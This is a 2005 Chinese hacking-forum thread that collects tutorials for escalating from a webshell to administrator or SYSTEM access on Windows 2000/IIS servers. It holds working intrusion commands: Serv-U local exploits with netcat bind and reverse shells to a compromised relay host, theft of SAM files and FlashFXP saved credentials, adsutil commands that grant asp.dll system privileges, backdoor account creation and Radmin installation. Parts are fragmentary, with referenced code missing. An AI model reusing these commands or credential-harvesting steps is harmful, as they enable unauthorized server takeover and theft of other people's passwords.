以文本方式查看主题 - 电白社区 (http://www.525400.net/index.asp) -- 网络与安全 (http://www.525400.net/list.asp?boardid=76) ---- 目前黑客入侵服务器提升权限总结 (http://www.525400.net/dispbbs.asp?boardid=76&id=3073) |
-- 作者:小飞 -- 发布时间:2005-2-23 21:30:37 -- 目前黑客入侵服务器提升权限总结 通过webshell获得admin全攻略 话说到花了九牛二虎的力气获得了一个webshell, 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 用我新建的用户和密码连接~
如果提示没有权限,那我们就 存为xx.vbe 唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。 WIN2K+IIS5.0默认情况下应用程序保护选项是“中(共用的)”,这时IIS加载isapi是用的 所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test 加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。 正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了 可以把ISAPIHack.dll上传到IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。 下载系统的 %windir%//repair//sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件, 反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" |
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:00 -- WEBSHELL权限提升 动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
四 [/R] [/W] REPLACE [drive1:][path1]filename [drive2:][path2] [/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。 [Startup] 将文件scripts.ini保存到“C://winnt//system32//GroupPolicy//Machine//Scripts” |
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:14 -- 使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。 其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。 其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。 其三,通过替换系统服务来提升。 其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。 本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:) 本人在www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够 黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版 本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing 图1 于是上传了一个asp的脚本的后门,怎么提升权限呢? 在这个网站的主机上游荡了N分钟,在C:// Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢? 于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了 对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。 说了半天这提升权限的事情一点没讲啊 不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊! 又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。 现在的星号密码会不会也是加了密的?看看就行了呗。 怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧 下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵 密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+ 用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69 (上述部分密码和用户名已经作了必要的修改) 这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。 我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。 <!-- Message body /'/'"" --> |
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:29 -- 将asp权限提到最高by: cnqing from:http://friend.91eb.com 本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。 原理: asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system 方法: 第一步。 得到inprocesslsapiapps内容,用命令"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。 第二步 写一个bat内容为"cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" ····· 省略号为复制下的内容。中间用空格分开不要带回车符 最后运行这个bat就行了。 例如: 我用"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"得到 那么你的bat就应该是: 已测试成功!! |
-- 作者:小飞 -- 发布时间:2005-2-23 21:31:44 -- 利用%5c绕过验证
|
-- 作者:小飞 -- 发布时间:2005-2-23 21:32:05 -- 提升权限终极技巧 作者:WekweN http://www.wrsky.com 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C://Documents and Settings//All Users//Application Data//Symantec//pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 ps: 破解工具本站已提供。请自己Search一下! 2.C://WINNT//system32//config进这里下它的SAM,破解用户的密码 用到破解sam密码的软件有LC,SAMinside 3.C://Documents and Settings//All Users//「开始」菜单//程序看这里能跳转不,我们从这里可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 4.c://winnt//system32//inetsrv//data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 保存为cgi执行, 如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir 显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录 http://anyhost//cmd.pl?c//perl//bin//su.exe 返回: Serv-u >3.x Local Exploit by xiaolu USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 现在是 IUSR 权限,提交: 如果返回下面的信息,就表示成功了 这样所有分区为everyone完全控制 现在我们把自己的用户提升为管理员: http://anyhost//cmd.pl?c//perl//bin//su.exe " net localgroup administrators IUSR_anyhost /add" 6.可以成功运行"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 用这个cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 再将asp.dll加入特权一族 asp.dll是放在c://winnt//system32//inetsrv//asp.dll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT//system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll""c://winnt//system32//inetsrv//asp.dll" 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 7.还可以用这段代码试提升,好象效果不明显 用这段代码检查是否提升成功 8.C://Program Files//Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。 9.最后了,如果主机设置很变态,可以试下在c://Documents and Settings//All Users//「开始」菜单//程序//启动"写入bat,vbs等木马。 等到主机重启或者你ddos逼它重启,来达到权限提升的目的。 总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执" 以上是本人的拙见,大家有什么好的方法多多分享 WekweN 04.12.12 |
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:12 -- 如何绕过防火墙提升权限 本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。 废话少说,咱们进入正题。 首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。 测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。 思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。 传上了srv.exe和nc.exe在H://long//sun***//lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D://Documents and Settings//All Users//是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。 可以浏览D://program files//serv-u//ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。 不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c://,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。 我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。) 高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H://long//sun***//lemon,再用刚才nc得到的shell把它们copy到d://winnt//system32//下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。 一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D://program files//serv-u//里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。) 不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D://program files//serv-u// ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。 好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以: ftp>quote site exec net user xr rain /add 在webshell上运行net user,就可以看见添加成功了。 整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。 |
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:31 -- |
-- 作者:小飞 -- 发布时间:2005-2-23 21:33:49 -- 巧用asp木马和KV2004得到管理员权限 重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。 |
-- 作者:小飞 -- 发布时间:2005-2-23 21:34:20 -- |
Windows NT/2000 通用的提升方法 攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。 本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法: 方法1 :下载系统的 %windir%//repair//sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。 问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。 方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。 问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。 (以上两种是离线的) 方法3 :使用 Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。 问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放 Netbios连接,就是 TCP的139 端口,如果用防火墙过滤了的话 Enum 就无法连接到主机。 (以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。) 方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而 PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。 问题:GetAdmin在 SP4有补丁修复了,不能用于高于 SP4的 WinNT 4系统,当然后来又有GetAdmin的增强版本,不过在 SP6a 下好像都不能成功运行。 注:这一方法利用了 WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。 (此外还有变通的方法。) 方法5 :在WinNT 4 和 Windows 2000 注册表里指定用户Shell 程序(Explorer.exe) 时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。 由于在系统启动时程序的搜索顺序问题使得 %Systemdrive%//Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。 问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。 注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。 方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。 问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。 (2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%//system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。 解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。 方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而 ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server端,它仅仅就是捕获用户的登录密码。 问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。 注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》 方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的 IIS4 的 ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然 Windows NT 和 Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。 问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。 (2 )静态图像服务缺省没有安装,只有用户在 Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。 注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。 Windows 2000专用提升漏洞方法方法1 : Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触 Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。 注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。 方法2 :利用 Windows 2000 的 Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。 问题:这个服务缺省没有启动,需要启动这个服务。 注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。 方法3 :Windows 2000的 TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果 TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次 TELNET 创建服务进程时,便会在本地 SYSTEM 环境中运行攻击者代码。 注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。 方法4 :WINDOWS 2K存在一个利用 Debug Registers提升权限的漏洞。如果攻击者能在 WIN2K中运行程序,利用此漏洞,他至少能取得对 %Windir%//SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。 注:这一方法利用了 Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。 | |
















